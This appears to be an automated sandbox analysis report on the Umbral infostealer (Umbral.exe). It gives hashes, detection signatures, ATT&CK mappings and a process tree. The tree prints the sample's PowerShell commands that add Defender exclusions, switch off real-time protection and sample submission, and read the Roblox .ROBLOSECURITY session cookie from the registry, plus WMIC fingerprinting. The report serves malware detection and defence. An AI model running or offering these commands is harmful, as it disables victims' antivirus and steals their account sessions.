umbral | 72ec2b7ff3142521a6e640371dbf03125af27057f77ab08e2d50b0f7e3f97f7f

Analysis

max time kernel
130s
max time network
137s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
25-06-2024 10:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Umbral.exe
Size

231KB
MD5

157dc3d81fee89af95e44300cb46bb94
SHA1

f7684bd8a11526a7cebeb668e32a01498785ed92
SHA256

72ec2b7ff3142521a6e640371dbf03125af27057f77ab08e2d50b0f7e3f97f7f
SHA512

fb7e7fa91fb1efef7d2e95578f305a9d81e48c8ad229cef9404abe7688d9cb8981ccd779a1ad2604d877a3cbeb6d7c5f4c5f46c07cffb309c06b44c50e9d39db
SSDEEP

6144:RloZMrfsXtioRkts/cnnK6cMlF5zgkqNlOZLWU1pAE7b8e1mW/i:joZBtlRk83MlF5zgkqNlOZLWU1pACe

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/4132-1-0x000001C2A7620000-0x000001C2A7660000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4140	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2944	wmic.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe
204	powershell.exe
204	powershell.exe
204	powershell.exe
3044	powershell.exe
3044	powershell.exe
3044	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
688	powershell.exe
688	powershell.exe
688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4132	Umbral.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeIncreaseQuotaPrivilege	4140	powershell.exe
Token: SeSecurityPrivilege	4140	powershell.exe
Token: SeTakeOwnershipPrivilege	4140	powershell.exe
Token: SeLoadDriverPrivilege	4140	powershell.exe
Token: SeSystemProfilePrivilege	4140	powershell.exe
Token: SeSystemtimePrivilege	4140	powershell.exe
Token: SeProfSingleProcessPrivilege	4140	powershell.exe
Token: SeIncBasePriorityPrivilege	4140	powershell.exe
Token: SeCreatePagefilePrivilege	4140	powershell.exe
Token: SeBackupPrivilege	4140	powershell.exe
Token: SeRestorePrivilege	4140	powershell.exe
Token: SeShutdownPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeSystemEnvironmentPrivilege	4140	powershell.exe
Token: SeRemoteShutdownPrivilege	4140	powershell.exe
Token: SeUndockPrivilege	4140	powershell.exe
Token: SeManageVolumePrivilege	4140	powershell.exe
Token: 33	4140	powershell.exe
Token: 34	4140	powershell.exe
Token: 35	4140	powershell.exe
Token: 36	4140	powershell.exe
Token: SeDebugPrivilege	204	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeIncreaseQuotaPrivilege	1528	wmic.exe
Token: SeSecurityPrivilege	1528	wmic.exe
Token: SeTakeOwnershipPrivilege	1528	wmic.exe
Token: SeLoadDriverPrivilege	1528	wmic.exe
Token: SeSystemProfilePrivilege	1528	wmic.exe
Token: SeSystemtimePrivilege	1528	wmic.exe
Token: SeProfSingleProcessPrivilege	1528	wmic.exe
Token: SeIncBasePriorityPrivilege	1528	wmic.exe
Token: SeCreatePagefilePrivilege	1528	wmic.exe
Token: SeBackupPrivilege	1528	wmic.exe
Token: SeRestorePrivilege	1528	wmic.exe
Token: SeShutdownPrivilege	1528	wmic.exe
Token: SeDebugPrivilege	1528	wmic.exe
Token: SeSystemEnvironmentPrivilege	1528	wmic.exe
Token: SeRemoteShutdownPrivilege	1528	wmic.exe
Token: SeUndockPrivilege	1528	wmic.exe
Token: SeManageVolumePrivilege	1528	wmic.exe
Token: 33	1528	wmic.exe
Token: 34	1528	wmic.exe
Token: 35	1528	wmic.exe
Token: 36	1528	wmic.exe
Token: SeIncreaseQuotaPrivilege	1528	wmic.exe
Token: SeSecurityPrivilege	1528	wmic.exe
Token: SeTakeOwnershipPrivilege	1528	wmic.exe
Token: SeLoadDriverPrivilege	1528	wmic.exe
Token: SeSystemProfilePrivilege	1528	wmic.exe
Token: SeSystemtimePrivilege	1528	wmic.exe
Token: SeProfSingleProcessPrivilege	1528	wmic.exe
Token: SeIncBasePriorityPrivilege	1528	wmic.exe
Token: SeCreatePagefilePrivilege	1528	wmic.exe
Token: SeBackupPrivilege	1528	wmic.exe
Token: SeRestorePrivilege	1528	wmic.exe
Token: SeShutdownPrivilege	1528	wmic.exe
Token: SeDebugPrivilege	1528	wmic.exe
Token: SeSystemEnvironmentPrivilege	1528	wmic.exe
Token: SeRemoteShutdownPrivilege	1528	wmic.exe
Token: SeUndockPrivilege	1528	wmic.exe
Token: SeManageVolumePrivilege	1528	wmic.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4132 wrote to memory of 4140	4132	Umbral.exe	70
PID 4132 wrote to memory of 4140	4132	Umbral.exe	70
PID 4132 wrote to memory of 204	4132	Umbral.exe	73
PID 4132 wrote to memory of 204	4132	Umbral.exe	73
PID 4132 wrote to memory of 3044	4132	Umbral.exe	75
PID 4132 wrote to memory of 3044	4132	Umbral.exe	75
PID 4132 wrote to memory of 1756	4132	Umbral.exe	77
PID 4132 wrote to memory of 1756	4132	Umbral.exe	77
PID 4132 wrote to memory of 1528	4132	Umbral.exe	79
PID 4132 wrote to memory of 1528	4132	Umbral.exe	79
PID 4132 wrote to memory of 3016	4132	Umbral.exe	82
PID 4132 wrote to memory of 3016	4132	Umbral.exe	82
PID 4132 wrote to memory of 2920	4132	Umbral.exe	84
PID 4132 wrote to memory of 2920	4132	Umbral.exe	84
PID 4132 wrote to memory of 688	4132	Umbral.exe	86
PID 4132 wrote to memory of 688	4132	Umbral.exe	86
PID 4132 wrote to memory of 2944	4132	Umbral.exe	88
PID 4132 wrote to memory of 2944	4132	Umbral.exe	88

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:3016
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:688
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a1e59c03699269745b5643ba2081020

SHA1
241c59b7061ecad030a55befa9d87f34f3c00b86

SHA256
763b6400f3d37dd0dbd012d4ab2c32711c1343ac4a63be5699047e6a4e8663ba

SHA512
8fe90a94599415ae26a3028e13369961718334823081ff6153a583e10d3bdf209968c0bb330eca66cf0d83f714a6f42439754531222c8d4c619bfb6781998cec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e3987bb730613f999959ccae4502402

SHA1
0e7c89af7f448d033030c3de3ec233ca397784d0

SHA256
f43204724bda59a239a4d565f855956f320d61180090ca3b7976d0d8883cd90f

SHA512
d9e1a96b66692ee66e47b5a5c2d4d3f408aee2a260c05dc7589e6099c7dd03816ac843d88e203b2dde8b65422f05a1676e5c5bf5c8c18ae1b659ab6d8fd5e5f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d31dd566f82eb6935d1542e191b7ce90

SHA1
767d66596f2887411ae79d987559250376e3d4c2

SHA256
9e80c2f16313a7948c3ff9797c187ece300b8b0db6422a1ebc079f451368f678

SHA512
067aac75aaa113d77447c2f5d9314d7e3bb8f1a7f7c20b9444de40942ead2477a0c647863a2578a9b449202aa6bb4a821781752d57b9d71ce801f73914b63878

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cf1a1c523de1414255f0cb9c2739b96f

SHA1
5ea1fd8da8b6ffb5f0881a9759904fb3687c2905

SHA256
00408c83c0a9c1589704b77ecf1f196398e6015d8fc254ea90e5559cbbf9290a

SHA512
53946028a0277765386c1208082f1704c30dd69fc30b020ade82877c364d9629f5f7db92be07dfce0976a2254eee039e32b55f67a1beb57e4ec023bdbd0c951e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kncnud13.kv0.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/4132-153-0x000001C2A93A0000-0x000001C2A93AA000-memory.dmp

Filesize
40KB

Download
memory/4132-154-0x000001C2A93E0000-0x000001C2A93F2000-memory.dmp

Filesize
72KB

Download
memory/4132-188-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4132-1-0x000001C2A7620000-0x000001C2A7660000-memory.dmp

Filesize
256KB

Download
memory/4132-159-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4132-158-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

Filesize
4KB

Download
memory/4132-0-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

Filesize
4KB

Download
memory/4132-2-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4132-85-0x000001C2A9430000-0x000001C2A9480000-memory.dmp

Filesize
320KB

Download
memory/4132-86-0x000001C2A9380000-0x000001C2A939E000-memory.dmp

Filesize
120KB

Download
memory/4140-7-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-8-0x0000021D7A750000-0x0000021D7A772000-memory.dmp

Filesize
136KB

Download
memory/4140-9-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-13-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-54-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-50-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-43-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-12-0x0000021D7A980000-0x0000021D7A9F6000-memory.dmp

Filesize
472KB

Download